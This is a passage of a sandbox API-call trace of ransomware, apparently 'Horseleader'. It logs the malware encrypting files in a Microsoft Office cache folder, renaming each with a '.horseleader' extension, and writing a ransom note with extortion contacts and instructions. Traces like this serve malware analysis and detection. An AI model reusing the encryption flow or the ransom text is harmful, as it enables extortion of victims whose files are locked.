SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffe6eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.272] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x1915, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x1915, lpOverlapped=0x0) returned 1 [0221.272] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.273] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0221.273] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0221.273] CloseHandle (hObject=0x21c) returned 1 [0221.273] GetProcessHeap () returned 0x780000 [0221.273] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0221.273] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.horseleader") returned 92 [0221.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.horseleader")) returned 1 [0221.277] GetProcessHeap () returned 0x780000 [0221.277] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0221.277] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c87b0c0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x6c87b0c0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa6b67930, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x9b6ba9f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PrjPrrWW.cab", cAlternateFileName="")) returned 1 [0221.277] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="Windows") returned -1 [0221.277] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0221.277] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".horseleader") returned 0x0 [0221.277] lstrcmpW (lpString1="PrjPrrWW.cab", lpString2="#Decrypt#.txt") returned 1 [0221.277] lstrcmpW (lpString1="PrjPrrWW.cab", lpString2="_uninstalling_.png") returned 1 [0221.277] lstrlenW (lpString=".testttjffg") returned 11 [0221.277] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab", lpSrch=".testttjffg") returned 0x0 [0221.277] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0221.277] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0221.278] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0221.278] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0221.278] StrStrW (lpFirst="PrjPrrWW.cab", lpSrch=".txt") returned 0x0 [0221.278] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=162970271) returned 1 [0221.278] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.278] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.286] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.286] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.286] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4db354f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.287] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.310] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.310] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.311] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9b66a9f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.311] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.367] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.367] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.367] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.367] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0221.367] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0221.367] CloseHandle (hObject=0x21c) returned 1 [0221.368] GetProcessHeap () returned 0x780000 [0221.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0221.368] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.horseleader") returned 91 [0221.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.horseleader")) returned 1 [0221.368] GetProcessHeap () returned 0x780000 [0221.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0221.368] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69dde270, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x69dde270, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa8191670, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0221.368] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0221.368] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0221.368] StrStrIW (lpFirst="setup.exe", lpSrch=".horseleader") returned 0x0 [0221.368] lstrcmpW (lpString1="setup.exe", lpString2="#Decrypt#.txt") returned 1 [0221.369] lstrcmpW (lpString1="setup.exe", lpString2="_uninstalling_.png") returned 1 [0221.369] lstrlenW (lpString=".testttjffg") returned 11 [0221.369] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe", lpSrch=".testttjffg") returned 0x0 [0221.369] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0221.369] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0221.369] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0221.369] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0221.369] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0221.369] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1377656) returned 1 [0221.369] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.369] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.403] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.403] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.403] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa5abc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.403] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.102] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.102] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.102] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x14b578, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.102] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.154] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.154] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.155] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.155] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.155] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.155] CloseHandle (hObject=0x21c) returned 1 [0222.155] GetProcessHeap () returned 0x780000 [0222.155] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.155] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader") returned 88 [0222.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.horseleader")) returned 1 [0222.156] GetProcessHeap () returned 0x780000 [0222.156] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.156] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0222.156] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0222.156] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0222.157] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0222.157] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0222.157] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0222.157] lstrlenW (lpString=".testttjffg") returned 11 [0222.157] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0222.157] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.157] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.157] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.157] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0222.157] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0222.158] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=16683) returned 1 [0222.158] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x412b, lpOverlapped=0x0) returned 1 [0222.239] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffbed5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.239] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x412b, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x412b, lpOverlapped=0x0) returned 1 [0222.254] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.254] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.254] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.254] CloseHandle (hObject=0x21c) returned 1 [0222.255] GetProcessHeap () returned 0x780000 [0222.255] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.255] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0222.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0222.256] GetProcessHeap () returned 0x780000 [0222.256] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.256] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0222.256] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0222.256] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0222.256] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0222.257] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0222.257] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0222.259] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0222.259] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0222.259] CloseHandle (hObject=0x1cc) returned 1 [0222.259] GetProcessHeap () returned 0x780000 [0222.259] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0222.259] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, 